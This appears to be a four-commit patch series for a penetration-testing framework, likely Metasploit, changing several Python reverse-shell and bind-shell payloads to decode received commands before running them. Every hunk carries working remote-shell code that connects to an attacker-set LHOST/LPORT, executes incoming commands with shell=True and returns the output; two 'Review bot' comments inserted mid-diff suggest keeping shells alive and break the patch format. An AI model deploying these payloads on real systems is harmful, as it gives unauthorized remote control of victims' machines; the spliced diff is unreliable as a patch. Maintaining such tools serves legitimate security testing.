From bebf8d4db8fe97a232f40883b5272d15b5a9d545 Mon Sep 17 00:00:00 2001
From: manishkumarr1017
Date: Mon, 29 May 2023 21:38:16 +0530
Subject: [PATCH 1/4] changing payload structure of python's reverse_tcp for fixing windows bytes args is not allowed issue
---
 .../payloads/singles/python/shell_reverse_tcp.rb | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)
diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb
index 1c0ced2d5e..e2e4c23423 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -45,15 +45,19 @@ module MetasploitModule
 cmd = <<~PYTHON
 import socket as s
 import subprocess as r
+ import platform
 so=s.socket(s.AF_INET,s.SOCK_STREAM)
 so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
 while True:
- d=so.recv(1024)
- if len(d)==0:
- break
- p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
- o=p.stdout.read()+p.stderr.read()
- so.send(o)
+ d=so.recv(1024)
+ if len(d)==0:
+ break
+ if platform.system()=='Windows':
+ p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ else:
+ p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ o=p.stdout.read()+p.stderr.read()
+ so.send(o)
 PYTHON
 py_create_exec_stub(cmd)
From f8460dcdd256c28d9ea51212f9f2016d26312034 Mon Sep 17 00:00:00 2001
From: manishkumarr1017
Date: Fri, 2 Jun 2023 14:43:09 +0530
Subject: [PATCH 2/4] PR Review changes for removing platform specific code
---
 modules/payloads/singles/python/shell_reverse_tcp.rb | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb
index e2e4c23423..bacf5afd36 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -45,17 +45,13 @@ module MetasploitModule
 cmd = <<~PYTHON
 import socket as s
 import subprocess as r
- import platform
 so=s.socket(s.AF_INET,s.SOCK_STREAM)
 so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
 while True:
 d=so.recv(1024)
 if len(d)==0:
- break
- if platform.system()=='Windows':
- p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
- else:
- p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ break
+ p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
 o=p.stdout.read()+p.stderr.read()
 so.send(o)
 PYTHON
From d454e23aa092c9c3754b9684add07697102bca0e Mon Sep 17 00:00:00 2001
From: manishkumarr1017
Date: Thu, 8 Jun 2023 06:44:37 +0530
Subject: [PATCH 3/4] decoding bytes from all python payloads
---
 modules/payloads/singles/cmd/unix/reverse_python_ssl.rb | 2 +-
 modules/payloads/singles/python/shell_bind_tcp.rb | 2 +-
 modules/payloads/singles/python/shell_reverse_sctp.rb | 2 +-
 modules/payloads/singles/python/shell_reverse_tcp_ssl.rb | 2 +-
 modules/payloads/singles/python/shell_reverse_udp.rb | 2 +-
 5 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
index d1fc4bcd3a..0b7d3e7951 100644
--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
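Review bot: The unconditional `d.decode('utf-8')` on the new `p=r.Popen(...)` line turns any non-UTF-8 byte arriving from the handler into an uncaught `UnicodeDecodeError`, which escapes the `while True:` loop and ends the session outright, whereas the old bytes path would at most have failed that one command. Because `so.recv(1024)` returns at most 1024 bytes, a multi-byte character straddling a chunk boundary triggers the same exception even when the operator's input is valid UTF-8. A tolerant decode keeps the shell alive at the cost of garbling only the affected command: `p=r.Popen(d.decode('utf-8','replace'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)`. If this stub is still meant to run under Python 2 (not visible here), `d` is already `str` there and `.decode` yields `unicode`, which may behave differently for non-ASCII commands and is worth confirming.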
@@ -61,7 +61,7 @@ module MetasploitModule
 cmd += "while not #{dead}:\n"
 cmd += "\tdata=s.recv(1024)\n"
 cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
- cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+ cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
 cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
 cmd += "\ts.send(stdout_value)\n"
 "#{datastore['PythonPath']} -c \"#{ py_create_exec_stub(cmd) }\""
diff --git a/modules/payloads/singles/python/shell_bind_tcp.rb b/modules/payloads/singles/python/shell_bind_tcp.rb
index abeb893584..ef779fad3a 100644
--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -42,7 +42,7 @@ module MetasploitModule
 d=so.recv(1024)
 if len(d)==0:
 break
- p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
 o=p.stdout.read()+p.stderr.read()
 so.send(o)
 PYTHON
diff --git a/modules/payloads/singles/python/shell_reverse_sctp.rb b/modules/payloads/singles/python/shell_reverse_sctp.rb
index c8f1b0b6f3..eff88b0110 100644
--- a/modules/payloads/singles/python/shell_reverse_sctp.rb
+++ b/modules/payloads/singles/python/shell_reverse_sctp.rb
@@ -51,7 +51,7 @@ module MetasploitModule
 d=so.recv(1024)
 if len(d)==0:
 break
- p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
 o=p.stdout.read()+p.stderr.read()
 try:
 so.send(o)
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
index 106c3d8a35..07c1879e54 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
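Review bot: The new `data.decode('utf-8')` in the generated `proc=subprocess.Popen(...)` line has no handler anywhere in this hunk, so a single undecodable byte (or a multi-byte sequence split by the 1024-byte `s.recv`) raises `UnicodeDecodeError` out of the `while not #{dead}:` loop and kills the SSL shell instead of failing one command. The same unguarded decode is introduced in this commit's other four files (`shell_bind_tcp`, `shell_reverse_sctp`, `shell_reverse_tcp_ssl`, `shell_reverse_udp`), so whatever remedy is chosen should be applied to all of them. The minimal change is a tolerant decode in the generated line: `cmd += "\tproc=subprocess.Popen(data.decode('utf-8','replace'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"`. The Ruby method that assembles `cmd` starts before this hunk and its surrounding setup is not visible here.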
@@ -53,7 +53,7 @@ module MetasploitModule
 d=so.recv(1024)
 if len(d)==0:
 break
- p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
 o=p.stdout.read()+p.stderr.read()
 so.sendall(o)
 PYTHON
diff --git a/modules/payloads/singles/python/shell_reverse_udp.rb b/modules/payloads/singles/python/shell_reverse_udp.rb
index 02e8893456..95af617d7a 100644
--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -52,7 +52,7 @@ module MetasploitModule
 d=so.recv(1024)
 if len(d)==0:
 break
- p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
 o=p.stdout.read()+p.stderr.read()
 PYTHON
From 6030f75b1aae759a186eb27d376dae6f5b30aaa5 Mon Sep 17 00:00:00 2001
From: manishkumarr1017
Date: Thu, 8 Jun 2023 06:52:33 +0530
Subject: [PATCH 4/4] fixing indentation for shell reverse tcp payload
---
 modules/payloads/singles/python/shell_reverse_tcp.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb
index bacf5afd36..2468480dcf 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -48,12 +48,12 @@ module MetasploitModule
 so=s.socket(s.AF_INET,s.SOCK_STREAM)
 so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
 while True:
- d=so.recv(1024)
- if len(d)==0:
- break
- p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
- o=p.stdout.read()+p.stderr.read()
- so.send(o)
+ d=so.recv(1024)
+ if len(d)==0:
+ break
+ p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+ o=p.stdout.read()+p.stderr.read()
+ so.send(o)
 PYTHON
 py_create_exec_stub(cmd)